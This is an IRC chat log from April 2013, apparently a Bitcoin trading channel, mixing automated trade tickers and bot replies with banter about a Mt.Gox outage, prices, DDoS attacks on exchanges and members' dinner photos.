19:37:09 [BTCTC] [BTC-BOND] 5 @ 0.009901 = 0.0495 BTC [-] Apr 21 19:37:23 [BTCTC] [BASIC-MINING] 1 @ 0.4155 BTC [-] Apr 21 19:38:49 ;;eightball will we hit 50$ again ? Apr 21 19:38:50 What are you asking me for? Apr 21 19:39:10 ;;eightball why is error4733 asking gribble? Apr 21 19:39:10 What are you asking me for? Apr 21 19:39:24 [BTCTC] [COGNITIVE] 1 @ 0.175 BTC [-] Apr 21 19:39:34 [BTCTC] [B.YABMC] 1 @ 0.012001 BTC [-] Apr 21 19:39:38 [BTCTC] [B.YABMC] 83 @ 0.012 = 0.996 BTC [-] Apr 21 19:39:46 lets calibrate it Apr 21 19:39:50 ;;eightball am i a homosexual Apr 21 19:39:50 The answer is def-- oooh! shiny thing! Apr 21 19:40:11 Calibration successful? Apr 21 19:40:22 lol did he stick it in his mouth / Apr 21 19:40:23 ;;eightball is this a question? Apr 21 19:40:23 About as likely as pigs flying. Apr 21 19:41:01 [BTCTC] [ASICMINER-PT] 1 @ 1.11 BTC [-] Apr 21 19:41:05 [BTCTC] [ASICMINER-PT] 1 @ 1.07 BTC [-] Apr 21 19:41:09 [BTCTC] [ASICMINER-PT] 1 @ 1.062001 BTC [-] Apr 21 19:41:12 [BTCTC] [ASICMINER-PT] 8 @ 1.05 = 8.4 BTC [-] Apr 21 19:41:57 [BTCTC] [BASIC-MINING] 1 @ 0.411 BTC [-] Apr 21 19:42:16 ;;eightball will we hit 50$ again ? Apr 21 19:42:16 _I_ don't know. Apr 21 19:42:32 cristal clear ! thanks gribble Apr 21 19:43:16 "why is error4733 asking gribble?" still better than BTC E trollbox Apr 21 19:43:54 [BTCTC] [PAJKA.BOND] 1 @ 0.0976 BTC [-] Apr 21 19:44:02 [BTCTC] [PAJKA.BOND] 1 @ 0.0975 BTC [-] Apr 21 19:44:06 [BTCTC] [PAJKA.BOND] 1 @ 0.0954 BTC [-] Apr 21 19:46:05 whyever ppl always panic when gox has issues Apr 21 19:46:14 ;;eightball should I stick my dick in crazy? Apr 21 19:46:14 The answer is def-- oooh! shiny thing! Apr 21 19:53:21 [BTCTC] [COG.F] 2 @ 2.5 = 5 BTC [+] Apr 21 19:57:02 [HAVELOCK] [VTX] 5 @ 0.45 = 2.25 BTC [+] Apr 21 20:00:29 [BTCTC] [ASICMINER-PT] 1 @ 1.135 BTC [+] Apr 21 20:00:34 [BTCTC] [ASICMINER-PT] 1 @ 1.13799 BTC [+] Apr 21 20:06:20 [MPEX] [S.MPOE] 9252 @ 0.00072101 = 6.6708 BTC [+] Apr 21 20:06:21 [MPEX] [S.MPOE] 12648 @ 0.00072165 = 9.1274 BTC [+] Apr 21 20:10:00 https://twitter.com/Mircea_Popescu/status/326019965171953665 Apr 21 20:11:10 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Apr 21 20:15:01 [BTCTC] [S.BBET-PT] 1 @ 0.00219 BTC [+] Apr 21 20:22:34 Man Apr 21 20:34:22 ;;ticker Apr 21 20:34:23 BTCUSD ticker | Best bid: 124.89000, Best ask: 125.00000, Bid-ask spread: 0.11000, Last trade: 125.00000, 24 hour volume: 102398.14793661, 24 hour low: 117.86000, 24 hour high: 132.00000, 24 hour vwap: 125.27373 Apr 21 20:34:35 ;;goxlag Apr 21 20:34:36 Error: Problem retrieving gox lag. Try again later. Apr 21 20:34:37 gox is down Apr 21 20:34:43 3 hours already Apr 21 20:34:56 wonder how much business was lost Apr 21 20:35:05 how much money due to price movements that weren't able to be traded... Apr 21 20:36:44 down to $100 on btce and stamp Apr 21 20:36:56 shit, didnt even realize it was down Apr 21 20:37:12 omg mtgox is down? Apr 21 20:52:46 [BTCTC] [ASICMINER-PT] 1 @ 1.13499 BTC [-] Apr 21 20:54:00 [MPEX] [S.MPOE] 12900 @ 0.00071791 = 9.261 BTC [-] Apr 21 20:56:18 [BTCTC] [COGNITIVE] 6 @ 0.1985 = 1.191 BTC [+] Apr 21 21:03:53 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Apr 21 21:03:56 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Apr 21 21:05:20 [BTCTC] [PAJKA.BOND] 1 @ 0.1015 BTC [+] Apr 21 21:07:42 [BTCTC] [LTC-MINING] 3 @ 0.35 = 1.05 BTC [+] Apr 21 21:09:41 [BTCTC] [ESECURITYSABTC] 1 @ 0.36799 BTC [+] Apr 21 21:09:45 [BTCTC] [ESECURITYSABTC] 2 @ 0.36799 = 0.736 BTC [+] Apr 21 21:11:39 [BTCTC] [PAJKA.BOND] 1 @ 0.1016 BTC [+] Apr 21 21:12:09 [BTCTC] [PAJKA.BOND] 1 @ 0.1017 BTC [+] Apr 21 21:12:39 [BTCTC] [PAJKA.BOND] 7 @ 0.101736 = 0.7122 BTC [+] Apr 21 21:12:48 would be fun if gox stays down for days/weeks Apr 21 21:13:22 [BTCTC] [ASICMINER-PT] 1 @ 1.135 BTC [+] Apr 21 21:13:52 [BTCTC] [ASICMINER-PT] 1 @ 1.136 BTC [+] Apr 21 21:15:27 [BTCTC] [COGNITIVE] 3 @ 0.1985 = 0.5955 BTC [+] Apr 21 21:16:45 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 21 21:17:44 finally updated with real photo of mpoe-pr: http://trilema.com/2013/the-stuff-all-good-conspiracy-theories-start-with/ Apr 21 21:18:23 i started to thought, "mircea's boob job" is too good a joke to kill it Apr 21 21:31:09 FabianB at least it'd show all the people going on about how mtgox matters just how off they arew. Apr 21 21:31:21 jurov lol Apr 21 21:31:39 yeah Apr 21 22:08:27 by being dead, ofc Apr 21 22:11:31 [BTCTC] [ASICMINER-PT] 3 @ 1.13699 = 3.411 BTC [+] Apr 21 22:11:53 [BTCTC] [ASICMINER-PT] 1 @ 1.137 BTC [+] Apr 21 22:20:36 gsettings set com.canonical.notify-osd gravity 5 Apr 21 22:20:45 oh fuck me Apr 21 22:21:57 at least i got lucky wiht you today copumpkin ... gox is makin' me crazy. Apr 21 22:22:04 :) Apr 21 22:22:08 [MPEX] [S.DICE] 850 @ 0.00317524 = 2.699 BTC [-] Apr 21 22:22:23 ;;ticker Apr 21 22:22:24 BTCUSD ticker | Best bid: 117.75000, Best ask: 119.90000, Bid-ask spread: 2.15000, Last trade: 117.75000, 24 hour volume: 91170.92277480, 24 hour low: 117.86000, 24 hour high: 132.00000, 24 hour vwap: 125.55629 Apr 21 22:22:44 lol Apr 21 22:22:56 ;;calc 445.44542715 * [ticker --last] Apr 21 22:22:57 53008.0058309 Apr 21 22:23:01 still not enough Apr 21 22:23:24 for? Apr 21 22:23:39 to buy 1 diablo coin? Apr 21 22:23:44 kakobrekla: dmc 2.0 Apr 21 22:23:58 just make it 3.0 Apr 21 22:24:00 or something Apr 21 22:24:09 kakobrekla: maybe after 2.0 succeeds Apr 21 22:24:23 aha by succeeds you mean fail? Apr 21 22:24:28 ;;calc 445.44542715 * [ticker --last] Apr 21 22:24:28 51295.7581534 Apr 21 22:24:30 i mean Apr 21 22:24:34 you just lost 1.8k Apr 21 22:24:35 at some point you gotta give up right? Apr 21 22:25:29 kakobrekla: why should I give up? Apr 21 22:25:34 things never get done when people give up Apr 21 22:25:45 cause at some point we will run out of coins Apr 21 22:25:49 for your project Apr 21 22:25:53 the whole 21 mio Apr 21 22:26:33 kakobrekla: you imply Im going to hold them all at one time Apr 21 22:26:52 nah, losing priv key at some point prolly Apr 21 22:26:58 or just for cover. Apr 21 22:27:09 ;;calc 100000000 / [ticker -- last] Apr 21 22:27:18 ;;calc 100000000 / [ticker --last] Apr 21 22:27:20 Error: There's really no reason why you should have underscores or brackets in your mathematical expression. Please remove them. Apr 21 22:27:25 884955.752212 Apr 21 22:27:34 kakobrekla: not even close to all. Apr 21 22:27:51 close enough Apr 21 22:28:47 ;;calc 21000000 / 884955 Apr 21 22:28:47 23.7300201705 Apr 21 22:29:00 a 1/24th != all Apr 21 22:29:33 ya but close enough Apr 21 22:34:33 kakobrekla: and the news of DMC 2.0 coming close to success would drive prices up to $1000 Apr 21 22:35:10 id rofl but im tierd so im just gonna lol mkay Apr 21 22:36:06 i mean Apr 21 22:36:12 the only explanation to this is Apr 21 22:36:21 you delete the majority of btc Apr 21 22:36:27 that i would understand Apr 21 22:39:49 jurov: Im sorta doing that Apr 21 22:39:52 ;;calc 852000000000000000 / [ticker --last] Apr 21 22:39:53 7099999408333382 Apr 21 22:39:55 except Im not using IBM drives Apr 21 22:40:15 some sixtillion bitcoins Apr 21 22:40:21 lol Apr 21 22:40:57 anyone remembers terry pratchett's pyramids? Apr 21 22:41:23 they financed biggest pyramid by one coin Apr 21 22:41:34 that got back and forward in time Apr 21 22:41:44 we need dis Apr 21 22:42:02 [HAVELOCK] [SDICE] 8 @ 0.297499 = 2.38 BTC [-] Apr 21 22:42:03 [HAVELOCK] [SDICE] 1 @ 0.297499 BTC [-] Apr 21 22:43:19 but here it bears a risk of blockchain loopimg into itself Apr 21 22:43:29 *looping Apr 21 22:43:38 I dunno, if I wait long enough Apr 21 22:43:47 I'll have enough money to finance the whole thing myself Apr 21 22:47:04 [MPEX] [S.MPOE] 2830 @ 0.00072165 = 2.0423 BTC [+] Apr 21 22:47:05 [MPEX] [S.MPOE] 13820 @ 0.00072264 = 9.9869 BTC [+] Apr 21 22:57:58 [BTCTC] [S.DICE-PT] 1 @ 0.00302 BTC [-] Apr 21 22:58:57 [BTCTC] [S.DICE-PT] 97 @ 0.00301 = 0.292 BTC [-] Apr 21 23:03:46 bzzzzzzzzzz Apr 21 23:03:58 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 21 23:04:00 this is funny Apr 21 23:04:29 gox goes down everything kneels down Apr 21 23:04:35 good buying spot Apr 21 23:05:10 did btce realy dip below 100? Apr 21 23:05:29 yep Apr 21 23:05:39 did you get some? Apr 21 23:06:05 yep Apr 21 23:06:09 at 103 :) Apr 21 23:06:25 well done! Apr 21 23:06:32 i was lucky Apr 21 23:06:51 [MPEX] [S.MPOE] 5880 @ 0.00072264 = 4.2491 BTC [+] Apr 21 23:06:53 [MPEX] [S.MPOE] 4700 @ 0.00072933 = 3.4279 BTC [+] Apr 21 23:06:56 [MPEX] [S.MPOE] 7020 @ 0.00073 = 5.1246 BTC [+] Apr 21 23:07:26 it may. but not just yet. Apr 21 23:08:52 ill be buying on the way down then Apr 21 23:09:28 cant wait! Apr 21 23:10:41 nah, i wouldnt use bitfinex Apr 21 23:10:50 and theres no other place to short it Apr 21 23:11:02 except maybe otc Apr 21 23:12:08 (thats the right answer to the wrong question :) Apr 21 23:12:13 [BTCTC] [PAJKA.BOND] 50 @ 0.1 = 5 BTC [-] Apr 21 23:14:09 I think im gonna start doing crack Apr 21 23:14:22 kraken? Apr 21 23:14:31 yaaay skateboards! Apr 21 23:14:35 no..its mush better Apr 21 23:14:42 [courtesy of mrj] Apr 21 23:14:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19989 BTC [+] Apr 21 23:15:01 [BTCTC] [CRYPTO-TRADE] 33 @ 0.19989 = 6.5964 BTC [+] Apr 21 23:16:10 mircea_popescu, upon seeing latest rant on trilema - so you're excluding bitcoin-central folks from any further discussion? Apr 21 23:16:19 haha Apr 21 23:16:25 it was a nonbinding rant. Apr 21 23:17:06 lol Apr 21 23:17:09 hehe Apr 21 23:18:25 heh. don't forget french making complete mess in yurp after ww1, creating new cointries with funny names like czechoslovakia Apr 21 23:18:31 are there ever bitcoins lost or even stuck in transactions Apr 21 23:18:47 only to abandon the setup completely 20 years later Apr 21 23:19:24 KRS1 lose the private key - coins lost foreva Apr 21 23:19:37 KRS1 no. Apr 21 23:20:12 accually you could stick them into infinite tx loop Apr 21 23:20:13 theres probably a way to make keys quickly using quantum encryption somehow Apr 21 23:20:45 KRS1 and if you send transaction that all nodes around reject, android wallet can be coaxed to do it Apr 21 23:20:48 i would probably use quantum properties of light..sorry just thinking out loud. Apr 21 23:20:49 what exactly are we discussing here Apr 21 23:21:20 cats Apr 21 23:21:27 dogs really Apr 21 23:21:39 wonder if you'd have the key before you set up the quantum mechanics to decypher it..that would be weird. Apr 21 23:21:52 yes hello i have no idea what we're discussing. Apr 21 23:22:03 lol Apr 21 23:22:12 making private keys quickly Apr 21 23:22:15 memes mostly Apr 21 23:22:37 maybe truffles knows what I'm talking about? Apr 21 23:23:15 im no expert by any means but i know a thing or two Apr 21 23:23:27 me too Apr 21 23:23:30 about the subject..it could be quite lucritive =D Apr 21 23:23:59 'own' the blockchain instantly haha Apr 21 23:24:52 imho more likely than some quantum magic would be someone cracking /dev/random Apr 21 23:25:12 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Apr 21 23:25:41 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [-] Apr 21 23:25:43 maybe finding a way to simulate irregularities of network traffic or disk seeks or other stuff /dev/random is made from Apr 21 23:25:45 [BTCTC] [COGNITIVE] 4 @ 0.1985 = 0.794 BTC [+] Apr 21 23:26:32 and private keys off it Apr 21 23:26:36 i think somebody quantum cracked my champagne bottle Apr 21 23:27:02 what? drank it without opening? Apr 21 23:27:58 !bids 0 Apr 21 23:28:08 ;;bids 0 Apr 21 23:28:10 There are currently 32701641 bitcoins demanded at or over 0.0 USD, worth 19714724.4861 USD in total. | Data vintage: 0.0109 seconds Apr 21 23:28:39 the last sentence of 'double spending' says it all: https://en.bitcoin.it/wiki/How_bitcoin_works Apr 21 23:29:12 Using quantum mechanics you can most definatly gt the most computing power on the network Apr 21 23:29:26 then u can permanently controll which transactions appear in it Apr 21 23:29:34 start here http://jheusser.github.io/2013/02/03/satcoin.html Apr 21 23:31:02 [HAVELOCK] [VTX] 20 @ 0.47 = 9.4 BTC [+] Apr 21 23:31:15 yes- good stuff..this still relies on computing power to figure out the answer..with quantum mechanics, an infinite number of answers would be instantly applied, possibly revealing the correct one Apr 21 23:32:10 that's settled then. Apr 21 23:32:19 be a sport, give him an infinite number of misstated questions Apr 21 23:32:21 that should help Apr 21 23:32:52 that's NaN questions then Apr 21 23:32:53 lol yeah just theorizing..a lot of smart folks in here figured i'd hear something good..and i wasn't let down haaha Apr 21 23:33:04 lol NaN Apr 21 23:33:15 doesnt fit right Apr 21 23:34:35 but really, brainwallets are being mined as we speak Apr 21 23:35:10 true dat Apr 21 23:38:18 wats up wit ozcoin Apr 21 23:38:42 [BTCTC] [BASIC-MINING] 1 @ 0.41001 BTC [-] Apr 21 23:43:52 mircea_popescu: http://www.nasdaq.com/article/legendary-vc-paul-graham-suspects-bitcoin-was-created-by-a-government-cm238901#.UXRPWaKORUp Apr 21 23:43:59 have more fun with paul graham Apr 21 23:44:06 heh noty. Apr 21 23:44:23 when did he become legendary ?! i'm confused. Apr 21 23:53:53 who became legendary? Apr 21 23:53:54 Satoshi? Apr 21 23:55:09 i think there may be some folks in this irc channel that will become legends Apr 21 23:55:55 unless they take us away in black helicopters first... Apr 21 23:55:55 possibly. Apr 21 23:56:14 thestringpuller paul graham. dude made and sold some sort of doohickey to yahoo back in 1995. Apr 21 23:56:18 i fail to see the legend. Apr 21 23:59:12 the legend of ycombinator! Apr 21 23:59:14 JK Apr 21 23:59:27 I'm sad to say though, I've used AirBNB to throw loft parties. Apr 22 00:00:30 i can see that Apr 22 00:00:46 still... legend is a ways off. Apr 22 00:02:11 http://upload.wikimedia.org/wikipedia/commons/7/7c/Graham%27s_Hierarchy_of_Disagreement.svg <- some of his stuff is neat...(or is it)? Apr 22 00:02:14 wences : Apr 22 00:02:16 ;;market buy 20900 Apr 22 00:02:18 A market order to buy 20900 bitcoins right now would take 2764990.5722 USD and would take the last price up to 139.6900 USD, resulting in an average price of 132.2962 USD/BTC. | Data vintage: 0.0015 seconds Apr 22 00:02:40 thank you! Apr 22 00:02:50 you don't forget anything, do you? :) Apr 22 00:03:00 i have people halping me :D Apr 22 00:03:39 Maybe you ARE many people; some with a beard, some without... Apr 22 00:03:59 hehe Apr 22 00:04:35 every 5 days Apr 22 00:04:42 kakobrekla and mircea_popescu switch places Apr 22 00:04:55 wha? Apr 22 00:04:58 wences incidentally, seems you're the most recognisable face of the bildercoin. Apr 22 00:05:05 http://trilema.com/2013/the-stuff-all-good-conspiracy-theories-start-with/#comment-92857 Apr 22 00:05:08 took less thna a day Apr 22 00:05:35 (course mpoe-pr was recognised on sight but it's not really a fair comparison given the audience) Apr 22 00:06:15 hahahaha! You should not let people take such wild guesses anonymously Apr 22 00:06:22 make them show themselves :) Apr 22 00:06:25 what's bildercoin... Apr 22 00:06:29 wait whaaaa Apr 22 00:07:01 hehe trilema has an old tradition in anonimity. Apr 22 00:07:13 :) Apr 22 00:08:53 mircea_popescu what are these pictures from? an expensive dinner? Apr 22 00:09:00 yeah Apr 22 00:09:22 in romania? Apr 22 00:09:23 lol Apr 22 00:09:29 the second guy on the left looks a bit like evoorhees http://trilema.com/wp-content/uploads/2013/04/image.jpeg Apr 22 00:09:44 the first pic is called "the first supper" Apr 22 00:09:58 and the second pic, "the last supper"? Apr 22 00:10:06 nah Apr 22 00:10:18 so this was taken before MPEX? Apr 22 00:10:19 maximian right on. Apr 22 00:10:29 thestringpuller no, not before mpex. before yesterday. Apr 22 00:10:30 ;;isdown mtgox.com Apr 22 00:10:30 Error: "isdown" is not a valid command. Apr 22 00:10:33 heh, no shit! Apr 22 00:10:40 MPOE-PR is the woman in the red dress Apr 22 00:10:45 ;; Apr 22 00:10:47 that's his lovely ex gf, michelle right next to him Apr 22 00:10:51 ;; help Apr 22 00:10:51 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Apr 22 00:11:02 ok, so that explains where he's been Apr 22 00:11:06 !facts Apr 22 00:11:08 So these homies flew to romania to have dinner with you and smoke pot? Apr 22 00:11:33 we can't afford pot yet. Apr 22 00:11:37 maybe if bitcoin goes up moar. Apr 22 00:13:01 ^^ Apr 22 00:14:13 mircea_popescu: http://cdn.memegenerator.net/instances/400x/37167887.jpg Apr 22 00:14:28 lol Apr 22 00:17:01 I forgot Europeans don't celebrate 4/20 Apr 22 00:17:30 [BTCTC] [ASICMINER-PT] 3 @ 1.11 = 3.33 BTC [+] Apr 22 00:18:28 ain't nobody got time for that tiberiusiv Apr 22 00:18:35 [BTCTC] [ASICMINER-PT] 1 @ 1.091 BTC [-] Apr 22 00:18:42 is that luke two to the left of mircea? Apr 22 00:18:53 so is there a point in investing in asics? Apr 22 00:19:06 [BTCTC] [ASICMINER-PT] 1 @ 1.09001 BTC [-] Apr 22 00:19:13 [BTCTC] [ASICMINER-PT] 1 @ 1.09 BTC [-] Apr 22 00:19:14 kinda contemplating it, but i think all it will do really is give you a prety small % roi Apr 22 00:19:20 [BTCTC] [ASICMINER-PT] 1 @ 1.08101 BTC [-] Apr 22 00:19:25 luke ?! no luke. Apr 22 00:19:32 [BTCTC] [ASICMINER-PT] 1 @ 1.08001 BTC [-] Apr 22 00:19:40 [BTCTC] [ASICMINER-PT] 1 @ 1.08 BTC [-] Apr 22 00:19:44 lol mircea_popescu is like a cartoon: wears the same clothes in every picture Apr 22 00:19:54 and always has his collar popped Apr 22 00:20:15 [BTCTC] [ASICMINER-PT] 1 @ 1.079 BTC [-] Apr 22 00:20:29 wait is mircea the almish one with the vest and beard or the popped collar white suit guy Apr 22 00:20:34 lol Apr 22 00:21:00 no he's the one in the suit that he's always in Apr 22 00:21:02 I thought almish at first Apr 22 00:21:04 the white suit with the black shirt Apr 22 00:21:07 with the popped collar Apr 22 00:21:48 [BTCTC] [ASICMINER-PT] 1 @ 1.08001 BTC [+] Apr 22 00:21:50 mircea_popescu: y u pop yo collar? Apr 22 00:22:16 tis not popped tho. Apr 22 00:22:32 dat onefixt two to the right Apr 22 00:22:38 amirite Apr 22 00:22:47 tux next to him? Apr 22 00:22:50 nope Apr 22 00:22:52 ;;next Apr 22 00:22:53 \*AWAY UNTIL April 28\* resistance: 132, 136, 138-140 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 21 2013, 18:00 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 3 hours, 22 minutes, and 51 seconds ago Apr 22 00:23:13 tux prolly too big to fit in the room. Apr 22 00:23:24 we has limited space in romani. Apr 22 00:23:25 a Apr 22 00:23:42 There are currently 32712810 bitcoins demanded at or over 0.0 USD, worth 19862579.1046 USD in total. | Data vintage: 1102.5192 seconds Apr 22 00:23:50 MPOE-PR knows how to dress... Apr 22 00:23:51 oh its in romania? Apr 22 00:23:57 Look at dem shoes Apr 22 00:24:58 so visual proof that MPOE-PR is a femme fatale Apr 22 00:25:01 [HAVELOCK] [HIM] 2 @ 1.750001 = 3.5 BTC [-] Apr 22 00:25:11 (check) Apr 22 00:25:33 I think youd need a closer inspection to be sure Apr 22 00:25:57 not sure if not trap Apr 22 00:26:09 I've been seduced by enough femme fatales in the film noire phase of my life to know a femme fatale when I see one Apr 22 00:26:10 lol suspicious dub Apr 22 00:28:21 mircea_popescu: what did MPEX's ddos peak at? Apr 22 00:28:36 most i've seen was ~100 gbit. Apr 22 00:28:48 daaaamn Apr 22 00:28:50 actual peak possibly higher than that Apr 22 00:28:53 that's so much traffic... Apr 22 00:29:08 yes. Apr 22 00:29:35 mtgox was hit with about 77 Apr 22 00:31:26 http://www.microguy.net/images/staff.jpg Apr 22 00:31:32 hit by gojirra Apr 22 00:32:05 [BTCTC] [COGNITIVE] 1 @ 0.1989 BTC [+] Apr 22 00:33:13 what's gojira ? Apr 22 00:33:26 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [-] Apr 22 00:34:23 gohiraaaa Apr 22 00:34:24 ;;goxlag Apr 22 00:34:24 MtGox lag is 1.102353 seconds. During this time, light travels 0.00220910306944 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 22 00:36:27 GOOOOOJIRRRRAAAAAAA Apr 22 00:36:39 It's how japanese people say Godzilla Apr 22 00:36:41 GOJIRAAA Apr 22 00:38:51 ;;ticker Apr 22 00:38:52 BTCUSD ticker | Best bid: 122.46307, Best ask: 123.00000, Bid-ask spread: 0.53693, Last trade: 123.00000, 24 hour volume: 112146.25165570, 24 hour low: 110.00000, 24 hour high: 132.00000, 24 hour vwap: 123.37855 Apr 22 00:42:21 oic Apr 22 00:44:29 this ripple name... seems to attract many scams? http://www.youtube.com/watch?feature=player_embedded&v=JIJ9gemxxD8 Apr 22 00:44:42 s/name/word Apr 22 00:47:26 Hmm... anyone would like to take on some BTC-BOND? Someone wants to redeem and I don't feel like buying at these prices... Apr 22 00:51:38 Guess I'll just have to Apr 22 00:51:39 [BTCTC] [S.MPOE-PT] 200 @ 0.000643 = 0.1286 BTC [-] Apr 22 00:51:42 [BTCTC] [S.MPOE-PT] 120 @ 0.000642 = 0.077 BTC [-] Apr 22 00:51:45 [BTCTC] [S.MPOE-PT] 734 @ 0.000642 = 0.4712 BTC [-] Apr 22 00:51:49 [BTCTC] [S.MPOE-PT] 500 @ 0.000641 = 0.3205 BTC [-] Apr 22 00:51:52 [BTCTC] [S.MPOE-PT] 50 @ 0.00061 = 0.0305 BTC [-] Apr 22 00:51:55 [BTCTC] [S.MPOE-PT] 1475 @ 0.00061 = 0.8998 BTC [-] Apr 22 00:51:59 [BTCTC] [S.MPOE-PT] 155 @ 0.000597 = 0.0925 BTC [-] Apr 22 00:57:24 where? Apr 22 00:59:23 silence is golden Apr 22 00:59:54 go to otc then Apr 22 01:00:13 switch in between Apr 22 01:05:05 i feel like i dont know him Apr 22 01:06:47 elevator music Apr 22 01:08:27 Bruno Mars is the bastard child of Michael Jackson and Elvis Apr 22 01:09:04 he creeps me out Apr 22 01:09:11 but yes, he has a nice voice Apr 22 01:09:59 to each his own Apr 22 01:11:18 elevator music you say? http://www.youtube.com/watch?v=tEwHjRIlCnU Apr 22 01:14:12 skip to 2:15 Apr 22 01:15:25 well thats what my elevator is playing Apr 22 01:19:45 guys I've got some bad news Apr 22 01:19:50 http://www.youtube.com/watch?v=6lcrfg5np8o Apr 22 01:20:02 we're going to have to wrap this human species thing up and start over Apr 22 01:25:07 thats actually pretty good Apr 22 01:25:50 Mulder swapping aliens for scotch and young bitches Apr 22 01:26:27 HAHAHAHAHAHAHA Apr 22 01:26:28 OMG Apr 22 01:26:29 OMG Apr 22 01:27:10 Californication is about a writer Hank Moody (Dchovny) who has perpetual writers block. Apr 22 01:27:16 He proceeds to sleep with everyone. Apr 22 01:27:38 Californication is pretty much the story of mircea_popescu, if he were a writer with writer's block... Apr 22 01:29:01 what's the mean "much to be desired" Apr 22 01:29:04 he keeps you wanting more? Apr 22 01:34:04 lol would you prefer Paul Graham? Apr 22 01:36:29 justin tv? Apr 22 01:36:41 Anyone holding GSDPT on BTCT.co? Apr 22 01:37:02 justin tv is ycombinator? Apr 22 01:41:03 I guess not Apr 22 01:43:54 https://www.sierrachart.com/SupportBoard.php?ThreadID=527 Apr 22 01:43:59 So you all know, one thing we are noticing is that we keep losing the connection to the MTGox source data feed about every 20 minutes, however we automatically reconnect. This past hour we also noticed 2 interruptions lasting 3 minutes. Apr 22 01:44:06 We see that the MTGox data feed is not entirely reliable and also from an engineering perspective, its technical implementation really is very confusing and not well structured. Apr 22 01:44:14 They are using what is called a web socket and then on top of that Socket I/O . This is unnecessary and the method by which this is implemented is not technically correct. Apr 22 01:44:27 #win Apr 22 01:45:18 and they will support btc-e and bitstamp and the local bar toilet hole Apr 22 01:45:34 retarded. Apr 22 01:48:09 [BTCTC] [ASICMINER-PT] 10 @ 1.11 = 11.1 BTC [+] Apr 22 01:50:12 " Trading through with MTGox through Sierra Chart is not yet supported. This should be supported within the next 30 days. " Apr 22 01:50:27 Damn just bought some BTC Apr 22 01:50:29 Ho Ho Ho, chrismas before time Apr 22 01:50:37 I don't like buying at those prices Apr 22 01:50:48 But some wanted to redeem some BTC-BOND Apr 22 01:50:54 i wouldnt worry error4733, its gonna suck as much as gox sucks Apr 22 01:51:02 There are currently 27835.495 bitcoins demanded at or over 100.0 USD, worth 2997236.30925 USD in total. | Data vintage: 0.0092 seconds Apr 22 01:51:51 its was Apr 22 01:52:21 !bids 101 Apr 22 01:52:22 [22:20] There are currently 20546.789 bitcoins demanded at or over 101.0 USD, worth 2270526.2342 USD in total. | Data vintage: 0.0054 seconds Apr 22 01:52:30 3h ago Apr 22 01:52:39 ;;bids 101 Apr 22 01:52:39 There are currently 21613.226 bitcoins demanded at or over 101.0 USD, worth 2374477.9266 USD in total. | Data vintage: 96.8428 seconds Apr 22 01:53:00 nvm... Apr 22 01:53:03 apparently you can pay gox for a more realtimey socket, SC should do that Apr 22 01:53:34 they offer that? Apr 22 01:53:48 [BTCTC] [GSDPT] 20 @ 0.00365 = 0.073 BTC [-] Apr 22 01:53:51 [BTCTC] [GSDPT] 40 @ 0.0036 = 0.144 BTC [-] Apr 22 01:54:03 according to neofutur they do Apr 22 01:54:09 uhh? Apr 22 01:54:59 he is some form of gox lackey/shill Apr 22 01:56:10 erryday im shillin Apr 22 01:56:16 [BTCTC] [S.BBET-PT] 1 @ 0.00219 BTC [+] Apr 22 01:56:33 shillin villain style Apr 22 02:01:16 [BTCTC] [ASICMINER-PT] 1 @ 1.09 BTC [-] Apr 22 02:03:02 Really no GSDPT holder? Apr 22 02:04:05 I have a good offer... Apr 22 02:05:10 Nam what are oy asking about GSDPT? Apr 22 02:05:14 you* Apr 22 02:05:19 i think i have some Apr 22 02:06:21 take that MtGox : The streaming data feed from MTGox is not working at the moment. Their server is just not streaming any data. They really have serious reliability and efficiency problems. From what we can see, there whole architecture was not designed for efficiency. Obviously they will know best, but what we see is that one of their main problems is not so much that they have overwhelmed systems, more that they d Apr 22 02:06:22 o not have efficient data delivery. Apr 22 02:06:22 I want to sell into those bids. I'll offer a 5% bonus for trade with S.DICE-PT units Apr 22 02:07:24 i'm wrong Apr 22 02:07:26 i have none Apr 22 02:07:28 forgot i sold Apr 22 02:07:32 been away for a few days Apr 22 02:07:42 So like 4000 GSDPT units for 4200 S.DICE-PT if anyone else is interested Apr 22 02:08:18 i asked DT about moving some of my BF shares and he never got back to me Apr 22 02:08:25 [BTCTC] [S.BBET-PT] 1 @ 0.0022 BTC [+] Apr 22 02:08:28 He was here earlier Apr 22 02:08:29 [BTCTC] [S.BBET-PT] 28 @ 0.00221 = 0.0619 BTC [+] Apr 22 02:09:25 scamtrading Apr 22 02:09:31 lmiot Apr 22 02:09:58 lmiot? Apr 22 02:10:33 hao aboot 1337 shares of usagicorp for 300btc of pirate debt Apr 22 02:10:50 let me in on that Apr 22 02:12:01 kakobrekla lol Apr 22 02:12:52 these haters not understanding socket i/o over web socket geniuz. Apr 22 02:12:55 [BTCTC] [S.BBET-PT] 2 @ 0.00221 = 0.0044 BTC [+] Apr 22 02:13:43 Eh, whatever, dub Apr 22 02:14:48 http://polimedia.us/dtng/c/src/136658053566.jpg bwahaha who did this ? Apr 22 02:15:35 lolz Apr 22 02:28:48 [BTCTC] [ASICMINER-PT] 1 @ 1.09 BTC [-] Apr 22 02:28:54 [BTCTC] [ASICMINER-PT] 5 @ 1.085001 = 5.425 BTC [-] Apr 22 02:28:57 [BTCTC] [ASICMINER-PT] 3 @ 1.085 = 3.255 BTC [-] Apr 22 02:29:00 [BTCTC] [ASICMINER-PT] 1 @ 1.08002 BTC [-] Apr 22 02:29:03 [BTCTC] [ASICMINER-PT] 1 @ 1.08 BTC [-] Apr 22 02:33:05 [BTCTC] [GSDPT] 50 @ 0.003581 = 0.1791 BTC [-] Apr 